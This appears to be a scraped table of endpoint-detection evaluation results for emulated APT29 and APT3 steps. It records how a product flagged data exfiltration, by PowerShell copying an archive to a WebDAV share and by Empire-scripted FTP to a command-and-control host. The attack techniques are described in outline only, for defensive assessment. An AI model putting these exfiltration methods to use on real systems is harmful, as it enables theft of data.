Carbanak+FIN7
|
The technique was not in scope.
|
APT29
|
Step
|
ATT&CK Pattern
|
Detection Type |
Detection Note |
|
7.B.4
|
|
|
Telemetry showed PowerShell creating OfficeSupplies.7z on a remote adversary WebDav network share (192.168.0.4). The detection was correlated to a parent alert for the rcs.3aka3.doc screensaver process executing from users or temporary folder.
[1]
|
|
An MSSP detection occurred containing evidence of OfficeSupplies.7z being copied over the network via WebDav to 192.168.0.4.
[1]
|
General
(Correlated, Alert)
|
A General alert detection (red indicator) called "File being written to remote path" was generated for the file OfficeSupplies.7z being written a WebDav share at 192.168.0.4. The detection was correlated to a parent alert for the rcs.3aka3.doc screensaver process executing from users or temporary folder.
[1]
|
|
Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell
powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80)
[1]
Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell
powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80)
[1]
Exfiltrated collection (OfficeSupplies.7z) to WebDAV network share using PowerShell
powershell executing Copy-Item pointing to an attack-controlled WebDav network share (192.168.0.4:80)
[1]
APT3
|
Step
|
ATT&CK Pattern
|
Detection Type |
Detection Note |
|
19.C.1
|
|
|
The capability enriched ftp.exe as the execution of a CLI file transfer/copy utility. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
|
|
Telemetry showed the execution of ftp.exe and command-line arguments as well as a an outbound FTP connection to 192.168.0.4 (C2 server) on TCP port 21. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine.
|
|
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel